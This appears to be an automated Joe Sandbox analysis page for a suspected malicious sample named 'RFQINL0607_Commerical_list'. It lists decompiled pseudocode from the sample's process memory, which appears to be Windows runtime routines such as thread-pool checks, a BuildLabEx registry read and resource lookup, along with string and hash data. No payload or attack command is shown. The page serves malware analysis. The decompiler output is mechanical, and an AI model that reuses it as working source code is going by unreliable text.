					return E33394B50(_t83, _t122, _v8 ^ _t138, _t126, _t128, _t133);
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v104 = 0;
					_v100 = 0;
					_t88 = E33398870( *[fs:0x18] + 0x19c,  &_v104, 8);
					_t138 = _t138 + 0xc;
					if(_t88 != 0) {
						_push(8);
						_push( &_v104);
						_push(0x2c);
						_push(0xfffffffe);
						if(E33392A60() >= 0) {
							_t123 =  *[fs:0x18];
							 *((intOrPtr*)(_t123 + 0x19c)) = _v104;
							 *((intOrPtr*)(_t123 + 0x1a0)) = _v100;
						}
					}
					if(( *(_t121 + 0x28) & 0x00000001) != 0) {
						if(( *(_t121 + 0x38) & 0x00000001) == 0) {
							_t123 = _t121;
							E3336C700(_t121);
							 *(_t121 + 0x28) =  *(_t121 + 0x28) & 0x000000fe;
						}
					}
					if( *((intOrPtr*)(_t121 + 0x2c)) != 0) {
						if(( *(_t121 + 0x38) & 0x00000002) == 0) {
							E3337F1F0(0);
							 *((intOrPtr*)(_t121 + 0x2c)) = 0;
						}
					}
					_t83 =  *(_t121 + 0x48);
					if(_t83 != 0 && ( *(_t83 + 0x10c) & 0x00000001) == 0) {
						_t83 =  *[fs:0x18];
						_t131 = 0x50;
						if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) != 0) {
							if(( *(_t121 + 0x38) & 0x00000004) == 0) {
								E33398F40( &_v92, 0, _t131);
								_t138 = _t138 + 0xc;
								_v72 =  *((intOrPtr*)(_t121 + 0x30));
								_v68 =  *((intOrPtr*)(_t121 + 0x34));
								_push( &_v92);
								_v92 = 0xc0000710;
								_v76 = 2;
								E333A8A60(_t123, _t126);
								_push(4);
								_v100 = 0;
								_push( &_v100);
								_push(5);
								_push(0xfffffffe);
								_t83 = E33392A60();
							}
						}
						_t126 =  *(_t121 + 0x38);
						if((_t126 & 0x00000010) == 0 && E33356929() != 0) {
							_push( *((intOrPtr*)(_t121 + 0x34)));
							E333DEF10(0x54, 0, "ThreadPool: callback %p(%p) returned with a transaction uncleared\n",  *((intOrPtr*)(_t121 + 0x30)));
							E33398F40( &_v92, 0, _t131);
							_t138 = _t138 + 0x20;
							_v92 = 0xc000071d;
							_v76 = 0;
							_push( &_v92);
							_t83 = E333A8A60(_t123, _t126);
							_t126 =  *(_t121 + 0x38);
						}
						if((_t126 & 0x00000020) == 0) {
							_t123 =  *[fs:0x18];
							_t100 =  *((intOrPtr*)( *[fs:0x30] + 0xa0));
							_t83 =  *(_t100 + 0xc);
							if( *(_t100 + 0xc) ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
								_push( *((intOrPtr*)(_t121 + 0x34)));
								E333DEF10(0x54, 0, "ThreadPool: callback %p(%p) returned with the loader lock held\n",  *((intOrPtr*)(_t121 + 0x30)));
								E33398F40( &_v92, 0, _t131);
								_t138 = _t138 + 0x20;
								_v92 = 0xc000071e;
								_v76 = 0;
								_push( &_v92);
								_t83 = E333A8A60(_t123, _t126);
								_t126 =  *(_t121 + 0x38);
							}
						}
						if((_t126 & 0x00000040) == 0) {
							_t83 =  *[fs:0x18];
							if( *((intOrPtr*)( *[fs:0x18] + 0xfb8)) != 0) {
								_push( *((intOrPtr*)(_t121 + 0x34)));
								E333DEF10(0x54, 0, "ThreadPool: callback %p(%p) returned with preferred languages set\n",  *((intOrPtr*)(_t121 + 0x30)));
								E33398F40( &_v92, 0, _t131);
								_t138 = _t138 + 0x20;
								_v92 = 0xc000071f;
								_v76 = 0;
								_push( &_v92);
								_t83 = E333A8A60(_t123, _t126);
								_t126 =  *(_t121 + 0x38);
							}
						}
						if(_t126 >= 0) {
							_t83 =  *[fs:0x18];
							if( *((intOrPtr*)( *[fs:0x18] + 0xf88)) != 0) {
								_push( *((intOrPtr*)(_t121 + 0x34)));
								E333DEF10(0x54, 0, "ThreadPool: callback %p(%p) returned with background priorities set\n",  *((intOrPtr*)(_t121 + 0x30)));
								E33398F40( &_v92, 0, _t131);
								_t138 = _t138 + 0x20;
								_v92 = 0xc0000720;
								_v76 = 0;
								_push( &_v92);
								_t83 = E333A8A60(_t123, _t126);
							}
						}
					}
					goto L15;
				}
			}
























                                                                                                                                                                                  0x333563cb
                                                                                                                                                                                  0x333563d3
                                                                                                                                                                                  0x333563db
                                                                                                                                                                                  0x333563dd
                                                                                                                                                                                  0x333563e2
                                                                                                                                                                                  0x333563e8
                                                                                                                                                                                  0x333564d4
                                                                                                                                                                                  0x333564d8
                                                                                                                                                                                  0x333564d9
                                                                                                                                                                                  0x333564da
                                                                                                                                                                                  0x333564e5
                                                                                                                                                                                  0x333563ee
                                                                                                                                                                                  0x3335640e
                                                                                                                                                                                  0x33356415
                                                                                                                                                                                  0x33356416
                                                                                                                                                                                  0x33356417
                                                                                                                                                                                  0x3335641a
                                                                                                                                                                                  0x3335641e
                                                                                                                                                                                  0x33356422
                                                                                                                                                                                  0x33356427
                                                                                                                                                                                  0x3335642c
                                                                                                                                                                                  0x333b0d22
                                                                                                                                                                                  0x333b0d28
                                                                                                                                                                                  0x333b0d29
                                                                                                                                                                                  0x333b0d2b
                                                                                                                                                                                  0x333b0d34
                                                                                                                                                                                  0x333b0d3a
                                                                                                                                                                                  0x333b0d45
                                                                                                                                                                                  0x333b0d4f
                                                                                                                                                                                  0x333b0d4f
                                                                                                                                                                                  0x333b0d34
                                                                                                                                                                                  0x33356436
                                                                                                                                                                                  0x333b0d5e
                                                                                                                                                                                  0x333b0d64
                                                                                                                                                                                  0x333b0d66
                                                                                                                                                                                  0x333b0d6b
                                                                                                                                                                                  0x333b0d6b
                                                                                                                                                                                  0x333b0d5e
                                                                                                                                                                                  0x3335643f
                                                                                                                                                                                  0x333b0d78
                                                                                                                                                                                  0x333b0d7f
                                                                                                                                                                                  0x333b0d84
                                                                                                                                                                                  0x333b0d84
                                                                                                                                                                                  0x333b0d78
                                                                                                                                                                                  0x33356445
                                                                                                                                                                                  0x3335644a
                                                                                                                                                                                  0x33356459
                                                                                                                                                                                  0x33356461
                                                                                                                                                                                  0x33356468
                                                                                                                                                                                  0x333b0d90
                                                                                                                                                                                  0x333b0d9d
                                                                                                                                                                                  0x333b0da5
                                                                                                                                                                                  0x333b0da8
                                                                                                                                                                                  0x333b0daf
                                                                                                                                                                                  0x333b0db7
                                                                                                                                                                                  0x333b0db8
                                                                                                                                                                                  0x333b0dc0
                                                                                                                                                                                  0x333b0dc8
                                                                                                                                                                                  0x333b0dcd
                                                                                                                                                                                  0x333b0dd3
                                                                                                                                                                                  0x333b0dd7
                                                                                                                                                                                  0x333b0dd8
                                                                                                                                                                                  0x333b0dda
                                                                                                                                                                                  0x333b0ddc
                                                                                                                                                                                  0x333b0ddc
                                                                                                                                                                                  0x333b0d90
                                                                                                                                                                                  0x3335646e
                                                                                                                                                                                  0x33356474
                                                                                                                                                                                  0x333b0de6
                                                                                                                                                                                  0x333b0df4
                                                                                                                                                                                  0x333b0e03
                                                                                                                                                                                  0x333b0e08
                                                                                                                                                                                  0x333b0e0b
                                                                                                                                                                                  0x333b0e17
                                                                                                                                                                                  0x333b0e1b
                                                                                                                                                                                  0x333b0e1c
                                                                                                                                                                                  0x333b0e21
                                                                                                                                                                                  0x333b0e21
                                                                                                                                                                                  0x33356486
                                                                                                                                                                                  0x3335648e
                                                                                                                                                                                  0x33356495
                                                                                                                                                                                  0x3335649b
                                                                                                                                                                                  0x333564a1
                                                                                                                                                                                  0x333b0e29
                                                                                                                                                                                  0x333b0e37
                                                                                                                                                                                  0x333b0e46
                                                                                                                                                                                  0x333b0e4b
                                                                                                                                                                                  0x333b0e4e
                                                                                                                                                                                  0x333b0e5a
                                                                                                                                                                                  0x333b0e5e
                                                                                                                                                                                  0x333b0e5f
                                                                                                                                                                                  0x333b0e64
                                                                                                                                                                                  0x333b0e64
                                                                                                                                                                                  0x333564a1
                                                                                                                                                                                  0x333564aa
                                                                                                                                                                                  0x333564ac
                                                                                                                                                                                  0x333564b8
                                                                                                                                                                                  0x333b0e6c
                                                                                                                                                                                  0x333b0e7a
                                                                                                                                                                                  0x333b0e89
                                                                                                                                                                                  0x333b0e8e
                                                                                                                                                                                  0x333b0e91
                                                                                                                                                                                  0x333b0e9d
                                                                                                                                                                                  0x333b0ea1
                                                                                                                                                                                  0x333b0ea2
                                                                                                                                                                                  0x333b0ea7
                                                                                                                                                                                  0x333b0ea7
                                                                                                                                                                                  0x333564b8
                                                                                                                                                                                  0x333564c0
                                                                                                                                                                                  0x333564c2
                                                                                                                                                                                  0x333564ce
                                                                                                                                                                                  0x333b0eaf
                                                                                                                                                                                  0x333b0ebd
                                                                                                                                                                                  0x333b0ecc
                                                                                                                                                                                  0x333b0ed1
                                                                                                                                                                                  0x333b0ed4
                                                                                                                                                                                  0x333b0ee0
                                                                                                                                                                                  0x333b0ee4
                                                                                                                                                                                  0x333b0ee5
                                                                                                                                                                                  0x333b0ee5
                                                                                                                                                                                  0x333564ce
                                                                                                                                                                                  0x333564c0
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335644a

                                                                                                                                                                                  Strings
                                                                                                                                                                                  • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 333B0E72
                                                                                                                                                                                  • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 333B0EB5
                                                                                                                                                                                  • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 333B0DEC
                                                                                                                                                                                  • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 333B0E2F
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                                                                  • API String ID: 0-1468400865
                                                                                                                                                                                  • Opcode ID: ad3b2c061fcb28e1650a5afd02e040d71ff118fc2649762da264df9f29f831fe
                                                                                                                                                                                  • Instruction ID: e66beca203ccaa736d45251e4a6587525a5d6a931306c73a580573f08d91812c
                                                                                                                                                                                  • Opcode Fuzzy Hash: ad3b2c061fcb28e1650a5afd02e040d71ff118fc2649762da264df9f29f831fe
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9C71BCB1D483049FEB50CF14C884F8B7BACEF847A5F449568F8888A696D734D588CB92
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 333490F8 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                                                                                                                  • API String ID: 2994545307-1391187441
                                                                                                                                                                                  • Opcode ID: e61f1926c8ce8577739eeb6f95884541fa6a843f22f8741a3c35d16e2d1b5999
                                                                                                                                                                                  • Instruction ID: f205ebe30033a61dc311ead60ad0a9c90acab819e9248d6995f9a83b0331e0a1
                                                                                                                                                                                  • Opcode Fuzzy Hash: e61f1926c8ce8577739eeb6f95884541fa6a843f22f8741a3c35d16e2d1b5999
                                                                                                                                                                                  • Instruction Fuzzy Hash: 35318136D11258EFEB01CF99CC84F9AB7FCEF457A0F14C0A5E814AB291D670EA40CA60
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 33391190 Relevance: 5.1, Strings: 4, Instructions: 97COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 65%
                                                                                                                                                                                  			E33391190(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, signed int _a8) {
				signed int _v8;
				char _v12;
				char _v20;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char* _v44;
				intOrPtr _v48;
				char _v52;
				signed int _t38;
				signed int _t39;
				void* _t55;
				void* _t61;
				void* _t62;
				signed int _t63;
				void* _t65;
				signed int _t70;

				_t55 = __edx;
				E33395050(__ecx,  &_v20, __ecx);
				_v52 = 0x18;
				_v44 =  &_v20;
				_v48 = 0;
				_push( &_v52);
				_push(0x20019);
				_v40 = 0x40;
				_push( &_v12);
				_v36 = 0;
				_v32 = 0;
				_t62 = E33392AB0();
				if(_t62 < 0) {
					L9:
					return _t62;
				}
				_t38 = _a8;
				_t63 = 2;
				_t39 = _t38 * _t63;
				_t70 = _t38 * _t63 >> 0x20;
				if(_t70 < 0 || _t70 <= 0 && _t39 <= 0xffffffff) {
					_v8 = _t39;
					_push( &_v8);
					_t61 = 0xc;
					_t58 = _t39;
					if(E3338457E(_t39, _t61) < 0) {
						goto L13;
					}
					_t65 = L33365D90(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
					if(_t65 == 0) {
						_t62 = 0xc0000017;
					} else {
						_t20 =  &_v28; // 0x3338e065
						E33395050(_t58, _t20, _t55);
						_push( &_a8);
						_push(_v8);
						_t23 =  &_v28; // 0x3338e065
						_push(_t65);
						_push(_t63);
						_push(_v12);
						_t62 = E33392B00();
						if(_t62 >= 0) {
							_t28 = _t65 + 0xc; // 0xc
							E333988C0(_a4, _t28,  *((intOrPtr*)(_t65 + 8)));
						}
						E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t65);
					}
					_push(_v12);
					E33392A80();
					goto L9;
				} else {
					L13:
					_push(_v12);
					E33392A80();
					return 0xc0000095;
				}
			}





















                                                                                                                                                                                  0x3339119f
                                                                                                                                                                                  0x333911a2
                                                                                                                                                                                  0x333911aa
                                                                                                                                                                                  0x333911b1
                                                                                                                                                                                  0x333911b9
                                                                                                                                                                                  0x333911bc
                                                                                                                                                                                  0x333911bd
                                                                                                                                                                                  0x333911c5
                                                                                                                                                                                  0x333911cc
                                                                                                                                                                                  0x333911cd
                                                                                                                                                                                  0x333911d0
                                                                                                                                                                                  0x333911d8
                                                                                                                                                                                  0x333911dc
                                                                                                                                                                                  0x3339126d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3339126d
                                                                                                                                                                                  0x333911e2
                                                                                                                                                                                  0x333911e7
                                                                                                                                                                                  0x333911e8
                                                                                                                                                                                  0x333911ea
                                                                                                                                                                                  0x333911ec
                                                                                                                                                                                  0x33391200
                                                                                                                                                                                  0x33391203
                                                                                                                                                                                  0x33391206
                                                                                                                                                                                  0x33391207
                                                                                                                                                                                  0x33391210
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33391229
                                                                                                                                                                                  0x3339122d
                                                                                                                                                                                  0x3339128a
                                                                                                                                                                                  0x3339122f
                                                                                                                                                                                  0x33391230
                                                                                                                                                                                  0x33391234
                                                                                                                                                                                  0x3339123c
                                                                                                                                                                                  0x3339123d
                                                                                                                                                                                  0x33391240
                                                                                                                                                                                  0x33391243
                                                                                                                                                                                  0x33391244
                                                                                                                                                                                  0x33391246
                                                                                                                                                                                  0x3339124e
                                                                                                                                                                                  0x33391252
                                                                                                                                                                                  0x33391279
                                                                                                                                                                                  0x33391280
                                                                                                                                                                                  0x33391285
                                                                                                                                                                                  0x33391260
                                                                                                                                                                                  0x33391260
                                                                                                                                                                                  0x33391265
                                                                                                                                                                                  0x33391268
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c9a99
                                                                                                                                                                                  0x333c9a99
                                                                                                                                                                                  0x333c9a99
                                                                                                                                                                                  0x333c9a9c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c9aa1

                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion$e83
                                                                                                                                                                                  • API String ID: 0-1253590341
                                                                                                                                                                                  • Opcode ID: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                                                                                                                                  • Instruction ID: 02bade4f18e1a7532656b826aa5c29ee511ebe9c8398b0cabfa8fc58c66206ed
                                                                                                                                                                                  • Opcode Fuzzy Hash: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                                                                                                                                  • Instruction Fuzzy Hash: 07316CB6D01619EBEB119F95CC84FDEBBBDEB84650F018025E904EB260DB30DA058BA0
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 33357072 Relevance: 4.7, APIs: 3, Instructions: 158timeCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 55%
                                                                                                                                                                                  			E33357072(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v0;
				signed int _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t51;
				signed int _t55;
				signed int* _t58;
				intOrPtr _t82;
				void* _t86;
				signed int _t87;
				signed int _t88;
				signed int _t92;
				signed int _t106;
				void* _t112;
				intOrPtr _t113;

				_t112 = __edx;
				_v24 = __ecx;
				_v20 = 0;
				_v16 = 0;
				_t113 =  *((intOrPtr*)(__edx + 0x58));
				if(_t113 != 0) {
					_push( &_v16);
					_push(0);
					_push(0);
					E333885E0(_t86, __edx, __edx, _t113, __eflags);
				}
				_t87 = _t112 + 0x8c;
				_t92 =  *_t87;
				do {
					_t106 = _t92;
					_t51 = _t92 >> 1;
					if(_t51 == 0) {
						_v12 = _v12 & 0x00000000;
						_v8 = _v8 & 0x00000000;
					} else {
						_v12 = 1;
						_v8 = 1;
						if((_t92 & 0x00000001 | _t51 * 0x00000002 - 0x00000002) < 2) {
							_v8 = _v8 & 0x00000000;
						}
					}
					asm("lock cmpxchg [ebx], ecx");
					_t92 = _t106;
				} while (_t92 != _t106);
				_t88 = _t87 | 0xffffffff;
				if(_t113 != 0) {
					__eflags = _v12;
					if(__eflags != 0) {
						__eflags = E33372120(_t88, _t92, 0, _t113);
						if(__eflags >= 0) {
							_t82 = _v24;
							_t33 = _t82 + 0x50;
							 *_t33 =  *(_t82 + 0x50) | 0x00000100;
							__eflags =  *_t33;
							 *((intOrPtr*)(_t82 + 0x64)) = _t113;
						} else {
							_v12 = _v12 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_v20 = 1;
						}
					}
					_push(_v16);
					_push(0);
					E3338A6D0(_t88, _t112, _t113, __eflags);
					__eflags = _v20;
					if(_v20 != 0) {
						E3337DB40(_t112 + 0x20, _t88, 0);
						E33424600(_t112);
					}
				}
				if(_v8 != 0) {
					_push(2);
					asm("lock xadd [edi], eax");
					_t55 = L33363C40();
					__eflags = _t55;
					if(_t55 != 0) {
						_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t58 = 0x7ffe0386;
					}
					__eflags =  *_t58;
					if( *_t58 != 0) {
						E33424BE0( *((intOrPtr*)(_t112 + 0x5c)), _t112 + 0x78,  *((intOrPtr*)(_t112 + 0x30)),  *((intOrPtr*)(_t112 + 0x34)),  *((intOrPtr*)(_t112 + 0x3c)));
					}
					L33361C8F(_t88, _t112 + 0x78,  *((intOrPtr*)(_t112 + 0x5c)), _t112,  *((intOrPtr*)(_t112 + 0x74)), 0);
					asm("lock xadd [edi], eax");
					if(__eflags == 0) {
						 *0x334491e0(_t112);
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t112 + 4))))))();
					}
				}
				if(_a4 != 0) {
					__eflags = E33351F36(0);
					if(__eflags != 0) {
						 *((intOrPtr*)(_t112 + 0x70)) = _v0;
						asm("lock xadd [edi], eax");
						if(__eflags == 0) {
							 *0x334491e0(_t112);
							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t112 + 4))))))();
						}
					}
				}
				if(_v12 != 0) {
					E33357007(_v24, _t112);
					return 1;
				}
				asm("lock xadd [edi], ebx");
				__eflags = _t88 == 1;
				if(_t88 == 1) {
					 *0x334491e0(_t112);
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t112 + 4))))))();
				}
				return 0;
			}
























                                                                                                                                                                                  0x3335707d
                                                                                                                                                                                  0x3335707f
                                                                                                                                                                                  0x33357084
                                                                                                                                                                                  0x33357087
                                                                                                                                                                                  0x3335708a
                                                                                                                                                                                  0x3335708f
                                                                                                                                                                                  0x333b1534
                                                                                                                                                                                  0x333b1535
                                                                                                                                                                                  0x333b1536
                                                                                                                                                                                  0x333b1537
                                                                                                                                                                                  0x333b1537
                                                                                                                                                                                  0x33357095
                                                                                                                                                                                  0x3335709b
                                                                                                                                                                                  0x3335709d
                                                                                                                                                                                  0x3335709f
                                                                                                                                                                                  0x333570a1
                                                                                                                                                                                  0x333570a3
                                                                                                                                                                                  0x333b1541
                                                                                                                                                                                  0x333b1545
                                                                                                                                                                                  0x333570a9
                                                                                                                                                                                  0x333570b0
                                                                                                                                                                                  0x333570bf
                                                                                                                                                                                  0x333570c5
                                                                                                                                                                                  0x333570c7
                                                                                                                                                                                  0x333570cb
                                                                                                                                                                                  0x333570c5
                                                                                                                                                                                  0x333570cf
                                                                                                                                                                                  0x333570d3
                                                                                                                                                                                  0x333570d5
                                                                                                                                                                                  0x333570d9
                                                                                                                                                                                  0x333570de
                                                                                                                                                                                  0x333b1551
                                                                                                                                                                                  0x333b1555
                                                                                                                                                                                  0x333b155f
                                                                                                                                                                                  0x333b1561
                                                                                                                                                                                  0x333b1574
                                                                                                                                                                                  0x333b1577
                                                                                                                                                                                  0x333b1577
                                                                                                                                                                                  0x333b1577
                                                                                                                                                                                  0x333b157e
                                                                                                                                                                                  0x333b1563
                                                                                                                                                                                  0x333b1563
                                                                                                                                                                                  0x333b1567
                                                                                                                                                                                  0x333b156b
                                                                                                                                                                                  0x333b156b
                                                                                                                                                                                  0x333b1561
                                                                                                                                                                                  0x333b1581
                                                                                                                                                                                  0x333b1584
                                                                                                                                                                                  0x333b1586
                                                                                                                                                                                  0x333b158b
                                                                                                                                                                                  0x333b158f
                                                                                                                                                                                  0x333b159c
                                                                                                                                                                                  0x333b15a2
                                                                                                                                                                                  0x333b15a2
                                                                                                                                                                                  0x333b158f
                                                                                                                                                                                  0x333570e8
                                                                                                                                                                                  0x3335710e
                                                                                                                                                                                  0x33357111
                                                                                                                                                                                  0x33357115
                                                                                                                                                                                  0x3335711a
                                                                                                                                                                                  0x3335711c
                                                                                                                                                                                  0x333b15b5
                                                                                                                                                                                  0x33357122
                                                                                                                                                                                  0x33357122
                                                                                                                                                                                  0x33357122
                                                                                                                                                                                  0x33357129
                                                                                                                                                                                  0x3335712b
                                                                                                                                                                                  0x333b15ce
                                                                                                                                                                                  0x333b15ce
                                                                                                                                                                                  0x3335713c
                                                                                                                                                                                  0x33357143
                                                                                                                                                                                  0x33357147
                                                                                                                                                                                  0x333b15e0
                                                                                                                                                                                  0x333b15e6
                                                                                                                                                                                  0x333b15e6
                                                                                                                                                                                  0x33357147
                                                                                                                                                                                  0x333570ee
                                                                                                                                                                                  0x33357157
                                                                                                                                                                                  0x33357159
                                                                                                                                                                                  0x3335715e
                                                                                                                                                                                  0x33357163
                                                                                                                                                                                  0x33357167
                                                                                                                                                                                  0x333b15f5
                                                                                                                                                                                  0x333b15fb
                                                                                                                                                                                  0x333b15fb
                                                                                                                                                                                  0x33357167
                                                                                                                                                                                  0x33357159
                                                                                                                                                                                  0x333570f4
                                                                                                                                                                                  0x333570ff
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33357106
                                                                                                                                                                                  0x333b1602
                                                                                                                                                                                  0x333b1606
                                                                                                                                                                                  0x333b1607
                                                                                                                                                                                  0x333b1611
                                                                                                                                                                                  0x333b1617
                                                                                                                                                                                  0x333b1617
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: DebugPrintTimes
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3446177414-0
                                                                                                                                                                                  • Opcode ID: 1841863d2f63c8cbc1ed3fc8e232ffeee1302430fbad002d73dc79f8925f35ed
                                                                                                                                                                                  • Instruction ID: 1ac76f7ffbb21b5ef31d5e4897246b8bb3e0039df763c8c44cd47e8ee786c956
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1841863d2f63c8cbc1ed3fc8e232ffeee1302430fbad002d73dc79f8925f35ed
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1151B735E40705EFEB05DF64C884BAEB7B8BF44355F14812AF402A7A90DB78DA01CB80
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 333E3608 Relevance: 4.1, Strings: 3, Instructions: 398COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 98%
                                                                                                                                                                                  			E333E3608(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				short _t140;
				short _t141;
				signed char* _t146;
				char* _t147;
				signed char* _t149;
				intOrPtr _t150;
				signed short _t167;
				intOrPtr _t185;
				signed int _t193;
				intOrPtr _t201;
				void* _t204;
				void* _t205;
				signed char* _t206;
				signed char* _t213;
				intOrPtr _t216;
				signed int _t217;
				intOrPtr* _t218;
				signed int _t220;
				short _t223;
				signed short _t230;
				char* _t232;
				intOrPtr* _t235;
				void* _t239;
				void* _t245;
				void* _t258;
				intOrPtr _t266;
				intOrPtr _t267;
				intOrPtr _t269;
				char* _t271;
				char* _t274;
				signed int _t275;
				void* _t279;
				void* _t280;

				_push(0x45c);
				_push(0x3342cf20);
				L333A7C40(__ebx, __edi, __esi);
				 *(_t280 - 0x430) = __edx;
				_t266 = __ecx;
				 *((intOrPtr*)(_t280 - 0x428)) = __ecx;
				 *((intOrPtr*)(_t280 - 0x440)) =  *((intOrPtr*)(_t280 + 8));
				 *((intOrPtr*)(_t280 - 0x450)) =  *((intOrPtr*)(_t280 + 0x10));
				 *((intOrPtr*)(_t280 - 0x44c)) =  *((intOrPtr*)(_t280 + 0x14));
				 *((intOrPtr*)(_t280 - 0x444)) =  *((intOrPtr*)(_t280 + 0x18));
				 *((intOrPtr*)(_t280 - 0x434)) =  *((intOrPtr*)(_t280 + 0x1c));
				_t223 = 0x42;
				 *((short*)(_t280 - 0x43c)) = _t223;
				_t140 = 0x44;
				 *((short*)(_t280 - 0x43a)) = _t140;
				 *(_t280 - 0x438) = L"LdrpResSearchResourceHandle Enter";
				_t141 = 0x40;
				 *((short*)(_t280 - 0x464)) = _t141;
				 *((short*)(_t280 - 0x462)) = _t223;
				 *(_t280 - 0x460) = L"LdrpResSearchResourceHandle Exit";
				_t271 = 0;
				E33398F40(_t280 - 0xc8, 0, _t141 + 0x6c);
				if(L33363C40() == 0) {
					_t146 = 0x7ffe0385;
				} else {
					_t146 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
				}
				if(( *_t146 & 0x00000001) == 0) {
					_t213 = 0x7ffe0384;
				} else {
					_t205 = L33363C40();
